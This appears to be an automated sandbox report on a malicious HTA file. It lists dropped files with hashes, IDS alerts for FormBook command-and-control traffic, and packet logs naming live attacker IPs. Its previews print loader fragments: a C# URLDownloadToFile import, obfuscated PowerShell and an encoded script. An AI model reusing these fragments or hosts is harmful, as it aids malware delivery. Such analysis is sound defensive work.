                                                                                                    SSDEEP:24:3ak0bgSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9t7J0gt/NKEr8HiD:qvgSU4y4RQmFoULF+mZ9tK8Nz7D
                                                                                                    MD5:5B8E4FF364793DD3EAC7C2C65918EB4C
                                                                                                    SHA1:F790A9D0E73499F0BA35A832FADB30944CBCEC5D
                                                                                                    SHA-256:69D8CB8B695D997BB12AAF6D03318000B7194DD6D9FDAF60187604E5C35BC2AC
                                                                                                    SHA-512:18167D9D6BB8E105E748347567E41E48A916DCA622B069717FE79B8F76C30236721DB10E7B72AE18B3AF2893DF06C8609B552209552E0301E543A8C8078A061F
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................^..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                    Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Dec 4 13:20:34 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1336
                                                                                                    Entropy (8bit):3.981027410773278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:H+m9IiJocF9/4xH+wKTF9mfwI+ycuZhNgakSMPNnqSSd:wiXFY9KTfmo1ulga3cqSC
                                                                                                    MD5:65C02123FB906BC6A2D3877E81C48ED4
                                                                                                    SHA1:733486E4A2D9C6ECE4B48039464843A38DA4B451
                                                                                                    SHA-256:8AF7BF63232A13EA39DC55D44DE4E953A8BC375822A19A1D398AF7908F1E9B06
                                                                                                    SHA-512:F42EF343844A0B516C6B570BD2751C746A6FD4E045F7A950A7189AEDC354AC40D85C66C9F762E141EE7DE4B8F2C41C8F72517DF24558092F5C64025D661AF018
                                                                                                    Malicious:false
                                                                                                    Preview:L..."WPg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP..................+L.M....P.....3...........5.......C:\Users\user\AppData\Local\Temp\RES66CD.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.0879939054127954
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryeak7YnqqMPN5Dlq5J:+RI+ycuZhNgakSMPNnqX
                                                                                                    MD5:2B4C1C4D88820F8250991A0AFF9B33A0
                                                                                                    SHA1:CB661BCDD83C64DD7C98C9386CB5942F00481929
                                                                                                    SHA-256:A2778B702AB3A3356C34CA498D07F0B57B6FEDE47FA859BB19085E6B8A6F8E13
                                                                                                    SHA-512:11965D4B653B2269FAE38E775CB6820063EF3A480E6FA1A53FBD9AADB798649E6E77075D275DDA4B27841B15523EC5AC98EA5807E923B2818215369FA3EE10F0
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):468
                                                                                                    Entropy (8bit):3.8182722012596346
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zuQyKXhHM+nQXReKJ8SRHy4HRauMY2/+l3Iy:V/DTLDfu44XfH4r+lIy
                                                                                                    MD5:55A4ED356C8411F5813A7DFEFAEBC6BF
                                                                                                    SHA1:60F8E2E6C2490EDD6FC434083637557EBAFDB8D6
                                                                                                    SHA-256:8D5075329ADD0CA9BB0A08F016BAB8F6F3B42F60FF47C7D1AFEC25483CDC09F9
                                                                                                    SHA-512:39C42748425442B0A895B24E5E9F53E6A8E5FF0246EDBFEC374CD662117EC98ADCB989207579E8FA321BDD2AADFE3AF6945F020320B304C0DB89990B2955E35B
                                                                                                    Malicious:false
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace zFcqWk.{. public class PezMbFwBZf. {. [DllImport("URLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr grJpz,string NA,string mMy,uint VcOhyLcNIhU,IntPtr sINt);.. }..}.
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.243750890976725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fq/WKnSJ0zxs7+AEszICHhJ23fq/WD:p37Lvkmb6KiiWKndWZEviWKn+H
                                                                                                    MD5:C5D2776E02AB3129A6DA68E99A7C54C9
                                                                                                    SHA1:828941DF6DA2B424063B5A1E4F6A858D08F5267E
                                                                                                    SHA-256:07B0AC4DF749CF06C381FD8A239ECA0E8A0D5D1007E5BCEC065800D13DCE3314
                                                                                                    SHA-512:C69CE679DC34BF8FC84D7D64337CF323874F925D4FED26A9DEBB372C43EBB8DAA905377B0A2CAAF7FCCA4A537850E7B1E0C38CB24145C29728E7E0342F83BED3
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.0.cs"
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.818435771053734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:etGS1PBG5eM7p8amzkwlAU3t4RtkZfQK+qhkWI+ycuZhNgakSMPNnq:62sM+ayAU3t4cJQjEH1ulga3cq
                                                                                                    MD5:C64EF70D65438860D6FD251C0C47B7D6
                                                                                                    SHA1:B665D3D8BBF6C49FCE90ACAF1ABBD6F92D402286
                                                                                                    SHA-256:9FB61E468A4FDC4C5AC7E55C96CAD1299063EDE749EA754AA6B6179C2D11EC22
                                                                                                    SHA-512:4DC268D4D6FFD51E25BABEB4B083C733CDF5BC2F2DA9B1636A56D26CADB37B518F28200405BB856A69677329C6710A0DECE27901846175965A17DC728A486ABE
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!WPg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.hf
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):870
                                                                                                    Entropy (8bit):5.3062722772270705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KOqd3ka6KiiWUyEviWU+OKax5DqBVKVrdFAMBJTH:xika6LiWUyEviWU+OK2DcVKdBJj
                                                                                                    MD5:DC86D0279A3C79B553E09E92C764D988
                                                                                                    SHA1:B035039824B34E2077520125E82E44D11F634583
                                                                                                    SHA-256:6EA64D0563752977CEBA756FD37E7734A99689A861DAF2D4F7D5262861AA87E0
                                                                                                    SHA-512:0AB743542073E31F19CC8205AD65608418921671F657471A86DC2D070BC6A25CF2B1DF22C45963FD0D515187911273FD37AB17DDC1B40A3C4BCEE8CB95270E75
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (3266), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):154108
                                                                                                    Entropy (8bit):3.80902206387575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Y53KPX3LVRMFTHvqq53KPX3LVRMF153KPX3LVRMF6:lPLVGFqPLVGFWPLVGF6
                                                                                                    MD5:714404045E7841CEBE0302E177C6CD3D
                                                                                                    SHA1:22EFC9796C48BA9527219AB6118E71D1CD9DA729
                                                                                                    SHA-256:EF6B11FE955BC7F2064CAD480851792FC6E9625325B32480252300BE1FEBA8DE
                                                                                                    SHA-512:D30E94AEFD53EAECB533AFC02E104370B93FBFD8767ECE8B663AF7F48E312EC37AB4C99243CC3A1995D4B2C5B08DA780DE0EA85BB041EA85F9C33B6039C97133
                                                                                                    Malicious:true
                                                                                                    Preview:...... . . . .....L.L.k.b.p.i.l.u.b.L.v.f.A.b.K. .=. .".K.c.a.i.s.I.I.o.A.P.L.d.B.K.i.".....N.G.Z.K.J.L.K.W.K.q.N.t.i.U.G. .=. .".L.Z.A.z.R.b.A.Z.x.c.K.f.b.i.Z.".....b.g.A.A.P.i.W.K.h.I.f.G.L.P.G. .=. .".t.p.m.r.i.o.c.k.W.C.d.i.l.U.I.".........W.n.q.k.f.L.B.L.i.A.s.o.S.z.W. .=. .".N.o.O.N.P.q.K.L.O.G.d.h.W.c.n.".....k.m.p.L.R.i.m.s.r.m.K.k.P.p.Z. .=. .".Q.W.u.Z.m.c.Z.i.q.K.B.x.c.s.k.".....o.T.i.c.b.L.L.B.N.i.i.U.i.A.N. .=. .".f.i.e.l.p.d.k.z.a.j.j.i.l.i.W.".....L.W.G.R.N.p.W.L.c.Z.f.G.K.J.h. .=. .".L.G.f.T.K.C.Z.v.N.L.A.e.b.L.b.".....r.L.C.L.q.d.G.g.L.K.u.W.K.n.o. .=. .".s.H.K.i.C.c.W.U.c.C.A.k.W.O.m.".....m.p.f.d.c.J.f.U.j.I.g.U.W.e.o. .=. .".i.p.o.c.U.p.S.k.e.i.t.l.c.W.k.".....r.K.d.u.G.S.q.p.H.K.L.O.Z.l.U. .=. .".I.L.G.b.o.h.G.K.Z.W.L.p.f.O.i.".....G.g.h.m.H.u.a.m.H.k.a.C.G.p.d. .=. .".m.p.U.h.z.i.i.i.Z.R.W.W.p.c.P.".....N.B.Z.Z.K.z.m.P.i.L.k.L.d.G.L. .=. .".f.a.o.R.i.i.Z.N.W.W.h.d.G.Q.C.".....C.j.v.Z.L.L.K.n.f.P.f.t.o.G.b. .=. .".L.N.O.P.A.f.h.W.p.m.n.g.K.h.h.".....O.Z.h.f.S.f.e.x.
                                                                                                    File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Entropy (8bit):2.480213116370656
                                                                                                    TrID:
                                                                                                      File name:bestimylover.hta
                                                                                                      File size:160'031 bytes
                                                                                                      MD5:a61aacd5049328c9b8e3460d53e943ad
                                                                                                      SHA1:ea66f697d5e07baf7dd6a4ab9d500688316b73fd
                                                                                                      SHA256:c9d68c4787494badf47161637edf290f9297f8d66bb64fbc307fc7a978980509
                                                                                                      SHA512:f940e05535a0f788b30758e2575646dab998b94581bf18fac2ef72f5ce7226e743f611fea21e6228de9a9186b241235524d09118db43e9d79494ecb107f63a68
                                                                                                      SSDEEP:96:4owZw9d6yfaZacMAfl6MLTIOxOHozDmacMAfl6MLTjLzOxOHozDFyn5Mh+4uCc05:4Lw4+4zc0pvP85Q
                                                                                                      TLSH:13F3E041A9240065FBFD5EA6ADEDB74E35A4221E9ECD9D4D4327FB80DCB324BA4409CC
                                                                                                      File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T13:08:11.192706+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 107.172.44.175 | 80 | 192.168.2.8 | 49709 | TCP
2024-12-04T13:08:11.192706+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 107.172.44.175 | 80 | 192.168.2.8 | 49709 | TCP
2024-12-04T13:08:31.061460+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 151.101.129.137 | 443 | 192.168.2.8 | 49705 | TCP
2024-12-04T13:09:38.120623+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49723 | 172.67.150.211 | 80 | TCP
2024-12-04T13:09:54.892305+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49764 | 172.67.128.109 | 80 | TCP
2024-12-04T13:09:57.553460+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49771 | 172.67.128.109 | 80 | TCP
2024-12-04T13:10:00.253464+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49777 | 172.67.128.109 | 80 | TCP
2024-12-04T13:10:02.988867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49783 | 172.67.128.109 | 80 | TCP
2024-12-04T13:10:10.198968+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49800 | 199.59.243.227 | 80 | TCP
2024-12-04T13:10:12.872968+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49810 | 199.59.243.227 | 80 | TCP
2024-12-04T13:10:15.529013+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49816 | 199.59.243.227 | 80 | TCP
2024-12-04T13:10:18.203664+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49822 | 199.59.243.227 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                      Dec 4, 2024 13:08:20.742186069 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.742400885 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.742441893 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.745985031 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.746032000 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.746221066 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.746269941 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.749851942 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.749901056 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.750112057 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.750293016 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.753743887 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.753798962 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.753971100 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.754017115 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.757591009 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.757641077 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.757838011 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.757878065 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.761411905 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.761455059 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.761686087 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.761730909 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.765250921 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.765295982 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.765508890 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.765552998 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.769573927 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.769618988 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.769723892 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.769767046 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.772943974 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.772984982 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.773227930 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.773272038 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.776844978 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.776891947 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.777142048 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.777184010 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.780657053 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.780706882 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.780925035 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.780967951 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.784571886 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.784755945 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.784921885 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.784966946 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.788398027 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.788450956 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.788636923 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.788681030 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.792243958 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.792289019 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.792506933 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.792555094 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.796097040 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.796142101 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.796360016 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.796401024 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.799962997 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.800009012 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.800220013 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.800261021 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.803805113 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.803850889 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.804052114 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.804094076 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.807717085 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.807780027 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.808202982 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.808253050 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.811573982 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.811629057 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.811805964 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.811851978 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.815716982 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.815769911 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.815984011 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.816026926 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.819423914 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.819472075 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.819756031 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.819799900 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.823103905 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.823156118 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.823371887 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.823415995 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.826972961 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.827023029 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.827198982 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.827243090 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.830781937 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.830827951 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.831028938 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.831072092 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.834626913 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.834696054 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:25.142764091 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:25.142849922 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:25.398324966 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:25.398364067 CET44349705151.101.129.137192.168.2.8
                                                                                                      Dec 4, 2024 13:08:25.398426056 CET49705443192.168.2.8151.101.129.137
                                                                                                      Dec 4, 2024 13:08:25.418311119 CET49705443192.168.2.8151.101.129.137
